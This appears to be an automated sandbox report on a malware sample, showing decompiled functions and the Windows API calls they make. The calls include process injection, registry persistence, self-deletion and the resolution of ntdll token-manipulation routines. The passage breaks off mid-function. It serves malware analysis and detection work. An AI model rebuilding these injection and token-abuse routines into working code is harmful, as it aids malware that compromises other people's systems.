Function 00409892, Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00409892(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t6;
				int _t7;
				signed int _t8;

				_t6 = _a4;
				 *0x413398 = _t6;
				 *0x41339c = 0 | _t6 != 0x00000002;
				 *0x4133a0 = _a8;
				 *0x4133ac = _a12;
				if(_t6 == 4 || _t6 == 1) {
					 *0x4133a8 =  *0x4133a8 & 0x00000000;
				} else {
					_t8 =  *0x41204c; // 0x2
					 *0x41204c =  *0x41204c + 1;
					 *0x4133a8 = _t8;
				}
				_t7 = SetServiceStatus( *0x413390, 0x413394); // executed
				return _t7;
			}

0x00409892
0x0040989e
0x004098a3
0x004098ad
0x004098b7
0x004098c0
0x004098d9
0x004098c7
0x004098c7
0x004098cc
0x004098d2
0x004098d2
0x004098eb
0x004098f1

APIs

SetServiceStatus.SECHOST(00413394), ref: 004098EB

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: ServiceStatus
String ID:
API String ID: 3969395364-0
Opcode ID: ed568b8bb23c32db7e8f15f5619feefc651b0b7a3ef30a3dcb983adc29e58fc0
Instruction ID: dd676a4af3dd8f9e000b524091363a81fd6157f1888c947a943bd607f736cbf1
Opcode Fuzzy Hash: ed568b8bb23c32db7e8f15f5619feefc651b0b7a3ef30a3dcb983adc29e58fc0
Instruction Fuzzy Hash: 02F0F271514208EFCB18CF14E89869A7BA0F348706B20C83EE82AD2371CB749A80DF0D

Uniqueness

Uniqueness Score: -1.00%

Function 00470920, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateProcess.KERNELBASE(000000FF,00000000), ref: 00470929

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 97ba61691119ac6c143e35c22e187454724cf2f5840cc222c11bd32825f4c7c2
Instruction ID: 81cc2d85be0b363c656950924f38b6f44aec89e449adb5a9cb9224a94380d57e
Opcode Fuzzy Hash: 97ba61691119ac6c143e35c22e187454724cf2f5840cc222c11bd32825f4c7c2
Instruction Fuzzy Hash: 8B90047034415C11DD3435DC0C11F0501015745774F3007317130DD1D4DC4055003315

Uniqueness

Uniqueness Score: -1.00%

Function 00460465, Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 004604B6

Memory Dump Source

Source File: 00000024.00000002.807063493.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_460000_lagavljy.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: a0493acab3598a450f74e59e88bf279398e2f0fd6f2714a22ff48452b0c7c613
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 64116C79A00208EFCB01DF98CA85E99BBF1AF08350F058095FA489B362D775EA50DF80

Uniqueness

Uniqueness Score: -1.00%

Function 004098F2, Relevance: 1.3, APIs: 1, Instructions: 37
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E004098F2(void* __ecx) {
				void* _t1;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t15;

				_t5 = __ecx;
				_t6 = 0;
				while(1) {
					_t1 = E00404280(_t5, 1); // executed
					_t7 = _t1;
					_pop(_t5);
					if(_t7 != 0) {
						break;
					}
					Sleep(0x3e8);
					_t6 = _t6 + 1;
					if(_t6 < 0xa) {
						continue;
					} else {
						_t15 = _t7;
					}
					break;
				}
				if(_t15 < 0) {
					_push(0);
					 *0x41201f = 1;
					E0040977C(_t5, E00402544(0x4122f8,  &E0041090C, 0xc, 0xe4, 0xc8)); // executed
					_t4 = E0040EE2A(_t5, 0x4122f8, 0, 0x100);
					 *0x41201f = 0;
					return _t4;
				}
				return _t1;
			}

0x004098f2
0x004098f4
0x004098f6
0x004098f8
0x004098fd
0x004098ff
0x00409902
0x00000000
0x00000000
0x00409909
0x0040990f
0x00409913
0x00000000
0x00409915
0x00409915
0x00409915
0x00000000
0x00409913
0x00409917
0x00409919
0x00409932
0x00409942
0x0040994f
0x00409957
0x00000000
0x00409957
0x00409960

APIs

Part of subcall function 00404280: CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 00404290

Sleep.KERNEL32(000003E8,00000100,004122F8,0040A3C7), ref: 00409909

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: CreateEventSleep
String ID:
API String ID: 3100162736-0
Opcode ID: 4d41be995d42169e7907864f945f5cc175d4e7c56b3013806251050fc082db50
Instruction ID: e56085e6bf9507d1b9c0d1fa6774ae3e34a200a1ca8b69066151cd7271dcc025
Opcode Fuzzy Hash: 4d41be995d42169e7907864f945f5cc175d4e7c56b3013806251050fc082db50
Instruction Fuzzy Hash: 58F05472A81360A6E62226566C07F8F19040B95B24F05417EF744BA2C395E8495141ED

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004765CC, Relevance: 6.1, APIs: 4, Instructions: 67memoryinjectionCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 004765DF
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 004765F9
VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000040), ref: 0047661A
WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 0047663B

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: AllocVirtual$HandleMemoryModuleProcessWrite
String ID:
API String ID: 1965334864-0
Opcode ID: f6d5bfc494c97751726a91e8fcfc29ef8439432d9fc6ff92f654e37a29c1b935
Instruction ID: b846bc3ada4ffbf5df046ab1876d62f9ab345ea5f2d74f9ca57eaabec7ca6b70
Opcode Fuzzy Hash: f6d5bfc494c97751726a91e8fcfc29ef8439432d9fc6ff92f654e37a29c1b935
Instruction Fuzzy Hash: 9E11A371600218BFDB214F65DC49FDB3FA9EB047A9F118025FD08E7290D7B5DD0086A8

Uniqueness

Uniqueness Score: -1.00%

Function 00479E89, Relevance: 59.9, APIs: 28, Strings: 6, Instructions: 421stringregistryfileCOMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 00479E56
lstrcpy.KERNEL32(?,00000000), ref: 00479FCA
lstrcat.KERNEL32(?,?), ref: 00479FDB
lstrcat.KERNEL32(?,0041070C), ref: 00479FED
GetFileAttributesExA.KERNEL32(?,?,?), ref: 0047A03D
DeleteFileA.KERNEL32(?), ref: 0047A088
GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 0047A0BF
lstrcpy.KERNEL32 ref: 0047A118
lstrlen.KERNEL32(00000022), ref: 0047A125
GetTempPathA.KERNEL32(000001F4,?), ref: 00479EFC

Part of subcall function 00477012: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00412F0C,00000000,00000000,00000000,00000000), ref: 0047706A

Part of subcall function 00476F19: GetModuleHandleA.KERNEL32(00410380,00410670,00000000,\\.\pipe\ncvtznjl,0047702C), ref: 00476F37
Part of subcall function 00476F19: GetProcAddress.KERNEL32(00000000), ref: 00476F3E
Part of subcall function 00476F19: GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 00476F64
Part of subcall function 00476F19: GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00476F7B

RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,?,00000103,?,?,?,?), ref: 0047A18B
RegSetValueExA.ADVAPI32(?,00000001,?,00000001,?,000001F5,?,?,?,00000103,?,?,?,?), ref: 0047A1AE
GetModuleHandleA.KERNEL32(?,?,00000104,?,?,00000010,?,?,00000044,?,?,?,?,?,?,00000103), ref: 0047A1FD
GetModuleFileNameA.KERNEL32(00000000,?,?,00000104,?,?,00000010,?,?,00000044), ref: 0047A204
GetDriveTypeA.KERNEL32(?), ref: 0047A24E
lstrcat.KERNEL32(?,00000000), ref: 0047A288
lstrcat.KERNEL32(?,00410A34), ref: 0047A2AE
lstrcat.KERNEL32(?,00000022), ref: 0047A2C2
lstrcat.KERNEL32(?,00410A34), ref: 0047A2DD
wsprintfA.USER32 ref: 0047A306
lstrcat.KERNEL32(?,00000000), ref: 0047A32E
lstrcat.KERNEL32(?,?), ref: 0047A34D
CreateProcessA.KERNEL32(?,?,?,?,?,08000000,?,?,?,?,?,?,00000104,?,?,00000010), ref: 0047A370
DeleteFileA.KERNEL32(?,?,?,?,?,?,08000000,?,?,?,?,?,?,00000104,?), ref: 0047A381
RegCloseKey.ADVAPI32(?,?,00000001,?,000001F5,?,?,?,00000103,?,?,?,?), ref: 0047A1BA

Part of subcall function 0047994F: RegOpenKeyExA.ADVAPI32(80000001,00000000), ref: 00479986
Part of subcall function 0047994F: RegDeleteValueA.ADVAPI32(?,00000000), ref: 004799A6
Part of subcall function 0047994F: RegCloseKey.ADVAPI32(?), ref: 004799AF

GetModuleHandleA.KERNEL32(?,?,0000012C), ref: 0047A3C4
GetModuleFileNameA.KERNEL32(00000000,?,?,0000012C), ref: 0047A3CB
GetDriveTypeA.KERNEL32(00000022), ref: 0047A406

Strings

", xrefs: 0047A3D9
", xrefs: 0047A12B
P, xrefs: 00479FFA
", xrefs: 0047A2C8
\, xrefs: 00479F5C
D, xrefs: 0047A1DE

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: lstrcat$FileModule$DeleteHandle$CloseDirectoryDriveNameOpenProcessTypeValuelstrcpy$AddressAttributesCreateEnvironmentExitInformationPathProcSystemTempVariableVolumeWindowslstrlenwsprintf
String ID: "$"$"$D$P$\
API String ID: 1653845638-2605685093
Opcode ID: 0c11c2300bf8887d3437573fd553245dec9800ee399a6cc752f87376d7d629c9
Instruction ID: 1129fcdaa7d744276eaf1f24aab2cb6b6cc99fc31405982a8b2c7e0de682e47a
Opcode Fuzzy Hash: 0c11c2300bf8887d3437573fd553245dec9800ee399a6cc752f87376d7d629c9
Instruction Fuzzy Hash: 1EF132B1C40259AEDF11DFA08C49EEF77BCAB49304F0484ABF60DE2141D7798A958F69

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 56.2, APIs: 16, Strings: 16, Instructions: 170
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401000() {
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t3;
				signed int _t4;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				struct HINSTANCE__* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t14;
				_Unknown_base(*)()* _t15;
				_Unknown_base(*)()* _t16;
				struct HINSTANCE__* _t17;
				_Unknown_base(*)()* _t18;
				_Unknown_base(*)()* _t19;
				_Unknown_base(*)()* _t20;
				struct HINSTANCE__* _t21;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;
				struct HINSTANCE__* _t25;
				struct HINSTANCE__* _t26;
				struct HINSTANCE__* _t27;
				struct HINSTANCE__* _t28;
				struct HINSTANCE__* _t29;
				struct HINSTANCE__* _t30;
				struct HINSTANCE__* _t31;
				struct HINSTANCE__* _t32;
				struct HINSTANCE__* _t33;
				signed int _t34;
				signed int _t35;

				_t2 =  *0x413918; // 0x0
				_t35 = _t34 | 0xffffffff;
				if(_t2 != 0) {
					L3:
					if( *0x41391c == 0 ||  *0x413920 == 0 ||  *0x413924 == 0 ||  *0x413928 == 0 ||  *0x41392c == 0 ||  *0x413930 == 0 ||  *0x413934 == 0 ||  *0x413938 == 0 ||  *0x41393c == 0 ||  *0x413940 == 0 ||  *0x413944 == 0 ||  *0x413948 == 0 ||  *0x41394c == 0 ||  *0x413950 == 0 ||  *0x413954 == 0) {
						_t3 = GetProcAddress(_t2, "RtlExpandEnvironmentStrings_U");
						 *0x41391c = _t3;
						if(_t3 == 0) {
							L34:
							_t4 = _t35;
						} else {
							_t5 =  *0x413918; // 0x0
							_t35 = 0xfffffffe;
							_t6 = GetProcAddress(_t5, "RtlSetLastWin32Error");
							 *0x413920 = _t6;
							if(_t6 == 0) {
								goto L34;
							} else {
								_t25 =  *0x413918; // 0x0
								_t35 = 0xfffffffd;
								_t7 = GetProcAddress(_t25, "NtTerminateProcess");
								 *0x413924 = _t7;
								if(_t7 == 0) {
									goto L34;
								} else {
									_t30 =  *0x413918; // 0x0
									_t35 = 0xfffffffc;
									_t8 = GetProcAddress(_t30, "RtlFreeSid");
									 *0x413928 = _t8;
									if(_t8 == 0) {
										goto L34;
									} else {
										_t9 =  *0x413918; // 0x0
										_t35 = 0xfffffffb;
										_t10 = GetProcAddress(_t9, "RtlInitUnicodeString");
										 *0x41392c = _t10;
										if(_t10 == 0) {
											goto L34;
										} else {
											_t26 =  *0x413918; // 0x0
											_t35 = 0xfffffffa;
											_t11 = GetProcAddress(_t26, "NtSetInformationThread");
											 *0x413930 = _t11;
											if(_t11 == 0) {
												goto L34;
											} else {
												_t31 =  *0x413918; // 0x0
												_t35 = 0xfffffff9;
												_t12 = GetProcAddress(_t31, "NtSetInformationToken");
												 *0x413934 = _t12;
												if(_t12 == 0) {
													goto L34;
												} else {
													_t13 =  *0x413918; // 0x0
													_t35 = 0xfffffff8;
													_t14 = GetProcAddress(_t13, "RtlNtStatusToDosError");
													 *0x413938 = _t14;
													if(_t14 == 0) {
														goto L34;
													} else {
														_t27 =  *0x413918; // 0x0
														_t35 = 0xfffffff7;
														_t15 = GetProcAddress(_t27, "NtClose");
														 *0x41393c = _t15;
														if(_t15 == 0) {
															goto L34;
														} else {
															_t32 =  *0x413918; // 0x0
															_t35 = 0xfffffff6;
															_t16 = GetProcAddress(_t32, "NtOpenProcessToken");
															 *0x413940 = _t16;
															if(_t16 == 0) {
																goto L34;
															} else {
																_t17 =  *0x413918; // 0x0
																_t35 = 0xfffffff5;
																_t18 = GetProcAddress(_t17, "NtDuplicateToken");
																 *0x413944 = _t18;
																if(_t18 == 0) {
																	goto L34;
																} else {
																	_t28 =  *0x413918; // 0x0
																	_t35 = 0xfffffff4;
																	_t19 = GetProcAddress(_t28, "RtlAllocateAndInitializeSid");
																	 *0x413948 = _t19;
																	if(_t19 == 0) {
																		goto L34;
																	} else {
																		_t33 =  *0x413918; // 0x0
																		_t35 = 0xfffffff3;
																		_t20 = GetProcAddress(_t33, "NtFilterToken");
																		 *0x41394c = _t20;
																		if(_t20 == 0) {
																			goto L34;
																		} else {
																			_t21 =  *0x413918; // 0x0
																			_t35 = 0xfffffff2;
																			_t22 = GetProcAddress(_t21, "RtlLengthSid");
																			 *0x413950 = _t22;
																			if(_t22 == 0) {
																				goto L34;
																			} else {
																				_t29 =  *0x413918; // 0x0
																				_t35 = 0xfffffff1;
																				_t23 = GetProcAddress(_t29, "NtQueryInformationToken");
																				 *0x413954 = _t23;
																				_t1 = _t35 + 0x10; // 0x100000001
																				_t4 = _t1;
																				if(_t23 == 0) {
																					goto L34;
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						return _t4;
					} else {
						return 1;
					}
				} else {
					_t2 = LoadLibraryA("ntdll.dll");
					 *0x413918 = _t2;
					if(_t2 != 0) {
						goto L3;
					} else {
						return _t2;
					}
				}
			}

0x00401000
0x00401006
0x0040100b
0x00401023
0x0040102a
0x004010c2
0x004010c4
0x004010cb
0x0040127b
0x0040127b
0x004010d1
0x004010d1
0x004010dc
0x004010e1
0x004010e3
0x004010ea
0x00000000
0x004010f0
0x004010f0
0x004010fc
0x00401101
0x00401103
0x0040110a
0x00000000
0x00401110
0x00401110
0x0040111c
0x00401121
0x00401123
0x0040112a
0x00000000
0x00401130
0x00401130
0x0040113b
0x00401140
0x00401142
0x00401149
0x00000000
0x0040114f
0x0040114f
0x0040115b
0x00401160
0x00401162
0x00401169
0x00000000
0x0040116f
0x0040116f
0x0040117b
0x00401180
0x00401182
0x00401189
0x00000000
0x0040118f
0x0040118f
0x0040119a
0x0040119f
0x004011a1
0x004011a8
0x00000000
0x004011ae
0x004011ae
0x004011ba
0x004011bf
0x004011c1
0x004011c8
0x00000000
0x004011ce
0x004011ce
0x004011da
0x004011df
0x004011e1
0x004011e8
0x00000000
0x004011ee
0x004011ee
0x004011f9
0x004011fe
0x00401200
0x00401207
0x00000000
0x00401209
0x00401209
0x00401215
0x0040121a
0x0040121c
0x00401223
0x00000000
0x00401225
0x00401225
0x00401231
0x00401236
0x00401238
0x0040123f
0x00000000
0x00401241
0x00401241
0x0040124c
0x00401251
0x00401253
0x0040125a
0x00000000
0x0040125c
0x0040125c
0x00401268
0x0040126d
0x0040126f
0x00401276
0x00401276
0x00401279
0x00000000
0x00000000
0x00401279
0x0040125a
0x0040123f
0x00401223
0x00401207
0x004011e8
0x004011c8
0x004011a8
0x00401189
0x00401169
0x00401149
0x0040112a
0x0040110a
0x004010ea
0x0040127f
0x004010ae
0x004010b4
0x004010b4
0x0040100d
0x00401012
0x00401018
0x0040101f
0x00000000
0x00401022
0x00401022
0x00401022
0x0040101f

APIs

LoadLibraryA.KERNEL32(ntdll.dll,00000000,00401839,00409646), ref: 00401012
GetProcAddress.KERNEL32(00000000,RtlExpandEnvironmentStrings_U), ref: 004010C2
GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 004010E1
GetProcAddress.KERNEL32(00000000,NtTerminateProcess), ref: 00401101
GetProcAddress.KERNEL32(00000000,RtlFreeSid), ref: 00401121
GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00401140
GetProcAddress.KERNEL32(00000000,NtSetInformationThread), ref: 00401160
GetProcAddress.KERNEL32(00000000,NtSetInformationToken), ref: 00401180
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040119F
GetProcAddress.KERNEL32(00000000,NtClose), ref: 004011BF
GetProcAddress.KERNEL32(00000000,NtOpenProcessToken), ref: 004011DF
GetProcAddress.KERNEL32(00000000,NtDuplicateToken), ref: 004011FE
GetProcAddress.KERNEL32(00000000,RtlAllocateAndInitializeSid), ref: 0040121A

Strings

NtTerminateProcess, xrefs: 004010F6
RtlExpandEnvironmentStrings_U, xrefs: 004010BC
RtlFreeSid, xrefs: 00401116
RtlSetLastWin32Error, xrefs: 004010D6
NtDuplicateToken, xrefs: 004011F3
NtSetInformationThread, xrefs: 00401155
RtlNtStatusToDosError, xrefs: 00401194
RtlLengthSid, xrefs: 00401246
NtQueryInformationToken, xrefs: 00401262
RtlAllocateAndInitializeSid, xrefs: 0040120F
NtOpenProcessToken, xrefs: 004011D4
NtSetInformationToken, xrefs: 00401175
NtFilterToken, xrefs: 0040122B
ntdll.dll, xrefs: 0040100D
RtlInitUnicodeString, xrefs: 00401135
NtClose, xrefs: 004011B4

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtClose$NtDuplicateToken$NtFilterToken$NtOpenProcessToken$NtQueryInformationToken$NtSetInformationThread$NtSetInformationToken$NtTerminateProcess$RtlAllocateAndInitializeSid$RtlExpandEnvironmentStrings_U$RtlFreeSid$RtlInitUnicodeString$RtlLengthSid$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
API String ID: 2238633743-3228201535
Opcode ID: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
Instruction ID: c8dd2db2df3f08e17c6117e54d1286841a2c4197db930f8a9693796d5e259140
Opcode Fuzzy Hash: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
Instruction Fuzzy Hash: 2F5100B1662641A6D7118F69EC84BD23AE86748372F14837B9520F62F0D7F8CAC1CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040B211, Relevance: 47.4, APIs: 7, Strings: 20, Instructions: 131
timeCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040B211(FILETIME* _a4, CHAR* _a8, signed int _a12) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				CHAR* _v32;
				CHAR* _v36;
				CHAR* _v40;
				CHAR* _v44;
				CHAR* _v48;
				CHAR* _v52;
				CHAR* _v56;
				CHAR* _v60;
				CHAR* _v64;
				CHAR* _v68;
				CHAR* _v72;
				CHAR* _v76;
				CHAR* _v80;
				CHAR* _v84;
				CHAR* _v88;
				CHAR* _v92;
				CHAR* _v96;
				CHAR* _v100;
				CHAR* _v104;
				struct _TIME_ZONE_INFORMATION _v276;
				long _t77;
				signed int _t80;
				signed int _t93;
				signed int _t101;
				signed int _t102;
				CHAR* _t103;
				signed int _t104;
				signed short _t106;
				signed short _t109;
				signed int _t114;
				signed int _t115;
				void* _t117;

				_v56 = "Sun";
				_v52 = "Mon";
				_v48 = "Tue";
				_v44 = "Wed";
				_v40 = "Thu";
				_v36 = "Fri";
				_v32 = "Sat";
				_v104 = "Jan";
				_v100 = "Feb";
				_v96 = "Mar";
				_v92 = "Apr";
				_v88 = "May";
				_v84 = "Jun";
				_v80 = "Jul";
				_v76 = "Aug";
				_v72 = "Sep";
				_v68 = "Oct";
				_v64 = "Nov";
				_v60 = "Dec";
				if(_a4 != 0) {
					FileTimeToLocalFileTime(_a4,  &_v12);
					FileTimeToSystemTime( &_v12,  &_v28);
				} else {
					GetLocalTime( &_v28);
				}
				_t114 = _a12;
				if(_t114 != 0) {
					SystemTimeToFileTime( &_v28,  &_v12);
					_t93 = E0040ECA5();
					if(_t114 <= 0) {
						_t104 = _t93 %  ~_t114 * 0x23c34600;
						_v12.dwLowDateTime = _v12.dwLowDateTime - _t104;
						asm("sbb [ebp-0x4], ebx");
					} else {
						_t104 = _t93 % _t114 * 0x23c34600;
						_v12.dwLowDateTime = _v12.dwLowDateTime + _t104;
						asm("adc [ebp-0x4], ebx");
					}
					FileTimeToSystemTime( &_v12,  &_v28);
				}
				_v276.Bias = 0;
				_t77 = GetTimeZoneInformation( &_v276);
				_t101 = _v276.Bias;
				if(_t77 == 2) {
					_t101 = _t101 + _v276.DaylightBias;
				}
				_t102 =  ~_t101;
				asm("cdq");
				_t80 = (_t102 ^ _t104) - _t104;
				if(_v28.wDayOfWeek > 6) {
					_t109 = 6;
					_v28.wDayOfWeek = _t109;
				}
				if(_v28.wMonth == 0) {
					_v28.wMonth = 1;
				}
				if(_v28.wMonth > 0xc) {
					_t106 = 0xc;
					_v28.wMonth = _t106;
				}
				_t103 = "+";
				if(_t102 < 0) {
					_t103 = "-";
				}
				_t115 = 0x3c;
				asm("cdq");
				return wsprintfA(_a8, "%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u",  *((intOrPtr*)(_t117 + (_v28.wDayOfWeek & 0x0000ffff) * 4 - 0x34)), _v28.wDay & 0x0000ffff,  *((intOrPtr*)(_t117 + (_v28.wMonth & 0x0000ffff) * 4 - 0x68)), _v28.wYear & 0x0000ffff, _v28.wHour & 0x0000ffff, _v28.wMinute & 0x0000ffff, _v28.wSecond & 0x0000ffff, _t103, _t80 / _t115, _t80 % _t115);
			}

APIs

GetLocalTime.KERNEL32(0003E800,?,0003E800,00000000), ref: 0040B2B3
FileTimeToLocalFileTime.KERNEL32(00000000,00000000,?,0003E800,00000000), ref: 0040B2C2
FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B2D0
SystemTimeToFileTime.KERNEL32(0003E800,00000000), ref: 0040B2E1
FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B31A
GetTimeZoneInformation.KERNEL32(?), ref: 0040B329
wsprintfA.USER32 ref: 0040B3B7

Strings

Wed, xrefs: 0040B23A
Jul, xrefs: 0040B280
Aug, xrefs: 0040B287
%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u, xrefs: 0040B3AF
Fri, xrefs: 0040B248
Sat, xrefs: 0040B24F
Sep, xrefs: 0040B28E
Tue, xrefs: 0040B233
Nov, xrefs: 0040B29C
Oct, xrefs: 0040B295
Apr, xrefs: 0040B26B
Feb, xrefs: 0040B25D
Jan, xrefs: 0040B256
Dec, xrefs: 0040B2A3
Jun, xrefs: 0040B279
Sun, xrefs: 0040B225
Thu, xrefs: 0040B241
Mon, xrefs: 0040B22C
May, xrefs: 0040B272
Mar, xrefs: 0040B264

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: Time$File$System$Local$InformationZonewsprintf
String ID: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$Apr$Aug$Dec$Feb$Fri$Jan$Jul$Jun$Mar$May$Mon$Nov$Oct$Sat$Sep$Sun$Thu$Tue$Wed
API String ID: 766114626-2976066047
Opcode ID: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
Instruction ID: 3cccae2c5b68faf9d5e65ebc3321ef0303f497beb4f825406ae493c25d793f5b
Opcode Fuzzy Hash: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
Instruction Fuzzy Hash: D8510EB1D0021CAADF18DFD5D8495EEBBB9EF48304F10856BE501B6250E7B84AC9CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00407A95, Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 269
registrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E00407A95(void* _a4, char* _a8, signed int _a12) {
				int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				struct _ACL* _v32;
				long _v36;
				long _v40;
				long _v44;
				int _v48;
				int _v52;
				union _SID_NAME_USE _v56;
				int _v60;
				int _v64;
				void _v132;
				char _v388;
				char _v516;
				struct _SECURITY_DESCRIPTOR _v1540;
				void* _t95;
				void* _t104;
				void* _t107;
				void* _t111;
				void* _t116;
				struct _ACL* _t117;
				void* _t118;
				void* _t120;
				void* _t122;
				void* _t123;
				void* _t125;
				char* _t126;
				void* _t130;
				void* _t134;
				void* _t135;
				signed int _t136;
				void* _t143;
				void* _t146;
				void* _t148;
				int _t151;
				char* _t158;
				void** _t159;
				void* _t161;
				void* _t164;
				signed int _t172;
				void* _t173;
				char* _t174;
				void* _t175;
				void* _t176;

				_v32 = 0;
				_v12 = 0;
				_v28 = 0;
				if(RegOpenKeyExA(_a4, _a8, 0, 0xe0100,  &_v28) != 0) {
					return 0;
				}
				_v40 = 0x80;
				_t95 = GetUserNameA( &_v388,  &_v40);
				__eflags = _t95;
				if(_t95 == 0) {
					L48:
					RegCloseKey(_v28);
					return _v12;
				} else {
					_v36 = 0x44;
					_v44 = 0x80;
					_t104 = LookupAccountNameA(0,  &_v388,  &_v132,  &_v36,  &_v516,  &_v44,  &_v56);
					__eflags = _t104;
					if(_t104 == 0) {
						goto L48;
					}
					_v48 = 0x400;
					_t107 = RegGetKeySecurity(_v28, 5,  &_v1540,  &_v48);
					__eflags = _t107;
					if(_t107 != 0) {
						goto L48;
					}
					_t111 = GetSecurityDescriptorOwner( &_v1540,  &_v16,  &_v60);
					__eflags = _t111;
					if(_t111 == 0) {
						L12:
						_v24 = 0;
						_t116 = GetSecurityDescriptorDacl( &_v1540,  &_v64,  &_v32,  &_v52);
						__eflags = _t116;
						if(_t116 == 0) {
							L47:
							goto L48;
						}
						_t117 = _v32;
						__eflags = _t117;
						if(_t117 == 0) {
							goto L47;
						}
						_t164 = 0;
						_v8 = 0;
						__eflags = 0 - _t117->AceCount;
						if(0 >= _t117->AceCount) {
							goto L47;
						} else {
							goto L15;
						}
						do {
							L15:
							_t118 = GetAce(_t117, _v8,  &_v20);
							__eflags = _t118;
							if(_t118 == 0) {
								L31:
								_t73 =  &_v8;
								 *_t73 = _v8 + 1;
								__eflags =  *_t73;
								goto L32;
							}
							_t172 = 0;
							_v16 = _v20 + 8;
							__eflags = _t164;
							if(_t164 <= 0) {
								L21:
								__eflags = _t164 - 0x20;
								if(_t164 < 0x20) {
									 *((intOrPtr*)(_t176 + _t164 * 4 - 0x100)) = _v16;
									_t164 = _t164 + 1;
									__eflags = _t164;
								}
